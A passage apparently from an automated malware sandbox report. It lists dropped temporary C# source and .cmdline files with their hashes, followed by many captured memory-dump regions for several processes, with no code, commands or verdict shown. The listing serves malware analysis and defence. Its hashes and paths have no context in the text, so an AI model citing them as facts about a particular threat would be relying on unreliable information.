                                                                                        5252c89ccade6ec3a8ee9e937f30b409eca8d6bd

                                                                                        SHA256

                                                                                        73afac984b13f51b0a0355ef4458b3c751c57bb131e9b9c238c1f0816a1522e8

                                                                                        SHA512

                                                                                        999f36322c0e12e6fe654b7697622a7777940fb4cec5852587d71a90ed351cc1c8414a2a3c97c0c2565e7d7a5c84cae4dc53061db6f82365742a25e23f193d37

                                                                                      • \??\c:\Users\Admin\AppData\Local\Temp\kql45a3i\kql45a3i.0.cs

                                                                                        Filesize

                                                                                        1004B

                                                                                        MD5

                                                                                        c76055a0388b713a1eabe16130684dc3

                                                                                        SHA1

                                                                                        ee11e84cf41d8a43340f7102e17660072906c402

                                                                                        SHA256

                                                                                        8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

                                                                                        SHA512

                                                                                        22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

                                                                                      • \??\c:\Users\Admin\AppData\Local\Temp\kql45a3i\kql45a3i.cmdline

                                                                                        Filesize

                                                                                        607B

                                                                                        MD5

                                                                                        8f3b6632aeef18e7612aa15d270662da

                                                                                        SHA1

                                                                                        d19d0176b2999b4839c8c3be17f0cdb3d72afe61

                                                                                        SHA256

                                                                                        cb63ce0aadcc369d15e4669b288ac4a98744ea47a136f0f2bc6d2db05ef7a00a

                                                                                        SHA512

                                                                                        b4014e4fe840cfa41a26bc5c979adead3087587d4ff12b083b69eb189a0714ca6e9fddd4cb22447b9ae0385eeb42a6f0cc2bba7582efdd29cccfd60e44e75623

                                                                                      • memory/3652-182-0x0000012B02F10000-0x0000012B02F18000-memory.dmp

                                                                                        Filesize

                                                                                        32KB

                                                                                      • memory/4884-89-0x00000277F0590000-0x00000277F05B2000-memory.dmp

                                                                                        Filesize

                                                                                        136KB

                                                                                      • memory/4908-30-0x00007FFB5A860000-0x00007FFB5A885000-memory.dmp

                                                                                        Filesize

                                                                                        148KB

                                                                                      • memory/4908-79-0x00007FFB53410000-0x00007FFB5352B000-memory.dmp

                                                                                        Filesize

                                                                                        1.1MB

                                                                                      • memory/4908-72-0x00007FFB56FD0000-0x00007FFB57003000-memory.dmp

                                                                                        Filesize

                                                                                        204KB

                                                                                      • memory/4908-108-0x00007FFB564B0000-0x00007FFB564D4000-memory.dmp

                                                                                        Filesize

                                                                                        144KB

                                                                                      • memory/4908-190-0x00007FFB46F40000-0x00007FFB470B7000-memory.dmp

                                                                                        Filesize

                                                                                        1.5MB

                                                                                      • memory/4908-71-0x00007FFB5A860000-0x00007FFB5A885000-memory.dmp

                                                                                        Filesize

                                                                                        148KB

                                                                                      • memory/4908-68-0x00007FFB47AE0000-0x00007FFB481B0000-memory.dmp

                                                                                        Filesize

                                                                                        6.8MB

                                                                                      • memory/4908-69-0x00007FFB57250000-0x00007FFB5725D000-memory.dmp

                                                                                        Filesize

                                                                                        52KB

                                                                                      • memory/4908-66-0x00007FFB5A8E0000-0x00007FFB5A8F9000-memory.dmp

                                                                                        Filesize

                                                                                        100KB

                                                                                      • memory/4908-64-0x00007FFB46F40000-0x00007FFB470B7000-memory.dmp

                                                                                        Filesize

                                                                                        1.5MB

                                                                                      • memory/4908-62-0x00007FFB564B0000-0x00007FFB564D4000-memory.dmp

                                                                                        Filesize

                                                                                        144KB

                                                                                      • memory/4908-61-0x00007FFB56520000-0x00007FFB56539000-memory.dmp

                                                                                        Filesize

                                                                                        100KB

                                                                                      • memory/4908-58-0x00007FFB475B0000-0x00007FFB47AD2000-memory.dmp

                                                                                        Filesize

                                                                                        5.1MB

                                                                                      • memory/4908-56-0x00007FFB56760000-0x00007FFB56775000-memory.dmp

                                                                                        Filesize

                                                                                        84KB

                                                                                      • memory/4908-54-0x00007FFB570B0000-0x00007FFB570DD000-memory.dmp

                                                                                        Filesize

                                                                                        180KB

                                                                                      • memory/4908-32-0x00007FFB5CE40000-0x00007FFB5CE4F000-memory.dmp

                                                                                        Filesize

                                                                                        60KB

                                                                                      • memory/4908-263-0x00007FFB56FD0000-0x00007FFB57003000-memory.dmp

                                                                                        Filesize

                                                                                        204KB

                                                                                      • memory/4908-78-0x00007FFB56760000-0x00007FFB56775000-memory.dmp

                                                                                        Filesize

                                                                                        84KB

                                                                                      • memory/4908-25-0x00007FFB47AE0000-0x00007FFB481B0000-memory.dmp

                                                                                        Filesize

                                                                                        6.8MB

                                                                                      • memory/4908-105-0x00007FFB475B0000-0x00007FFB47AD2000-memory.dmp

                                                                                        Filesize

                                                                                        5.1MB

                                                                                      • memory/4908-76-0x00007FFB56FC0000-0x00007FFB56FCD000-memory.dmp

                                                                                        Filesize

                                                                                        52KB

                                                                                      • memory/4908-74-0x00007FFB53530000-0x00007FFB535FD000-memory.dmp

                                                                                        Filesize

                                                                                        820KB

                                                                                      • memory/4908-271-0x00007FFB5A860000-0x00007FFB5A885000-memory.dmp

                                                                                        Filesize

                                                                                        148KB

                                                                                      • memory/4908-275-0x00007FFB475B0000-0x00007FFB47AD2000-memory.dmp

                                                                                        Filesize

                                                                                        5.1MB

                                                                                      • memory/4908-285-0x00007FFB53530000-0x00007FFB535FD000-memory.dmp

                                                                                        Filesize

                                                                                        820KB

                                                                                      • memory/4908-284-0x00007FFB53410000-0x00007FFB5352B000-memory.dmp

                                                                                        Filesize

                                                                                        1.1MB

                                                                                      • memory/4908-278-0x00007FFB46F40000-0x00007FFB470B7000-memory.dmp

                                                                                        Filesize

                                                                                        1.5MB

                                                                                      • memory/4908-270-0x00007FFB47AE0000-0x00007FFB481B0000-memory.dmp

                                                                                        Filesize

                                                                                        6.8MB

                                                                                      • memory/4908-321-0x00007FFB47AE0000-0x00007FFB481B0000-memory.dmp

                                                                                        Filesize

                                                                                        6.8MB

                                                                                      • memory/4908-325-0x00007FFB56760000-0x00007FFB56775000-memory.dmp

                                                                                        Filesize

                                                                                        84KB

                                                                                      • memory/4908-324-0x00007FFB570B0000-0x00007FFB570DD000-memory.dmp

                                                                                        Filesize

                                                                                        180KB

                                                                                      • memory/4908-323-0x00007FFB5CE40000-0x00007FFB5CE4F000-memory.dmp

                                                                                        Filesize

                                                                                        60KB

                                                                                      • memory/4908-322-0x00007FFB5A860000-0x00007FFB5A885000-memory.dmp

                                                                                        Filesize

                                                                                        148KB

                                                                                      • memory/4908-320-0x00007FFB53410000-0x00007FFB5352B000-memory.dmp

                                                                                        Filesize

                                                                                        1.1MB

                                                                                      • memory/4908-318-0x00007FFB53530000-0x00007FFB535FD000-memory.dmp

                                                                                        Filesize

                                                                                        820KB

                                                                                      • memory/4908-317-0x00007FFB56FD0000-0x00007FFB57003000-memory.dmp

                                                                                        Filesize

                                                                                        204KB

                                                                                      • memory/4908-316-0x00007FFB57250000-0x00007FFB5725D000-memory.dmp

                                                                                        Filesize

                                                                                        52KB

                                                                                      • memory/4908-314-0x00007FFB46F40000-0x00007FFB470B7000-memory.dmp

                                                                                        Filesize

                                                                                        1.5MB

                                                                                      • memory/4908-313-0x00007FFB564B0000-0x00007FFB564D4000-memory.dmp

                                                                                        Filesize

                                                                                        144KB

                                                                                      • memory/4908-312-0x00007FFB56520000-0x00007FFB56539000-memory.dmp

                                                                                        Filesize

                                                                                        100KB

                                                                                      • memory/4908-311-0x00007FFB475B0000-0x00007FFB47AD2000-memory.dmp

                                                                                        Filesize

                                                                                        5.1MB

                                                                                      • memory/4908-319-0x00007FFB56FC0000-0x00007FFB56FCD000-memory.dmp

                                                                                        Filesize

                                                                                        52KB

                                                                                      • memory/4908-315-0x00007FFB5A8E0000-0x00007FFB5A8F9000-memory.dmp

                                                                                        Filesize

                                                                                        100KB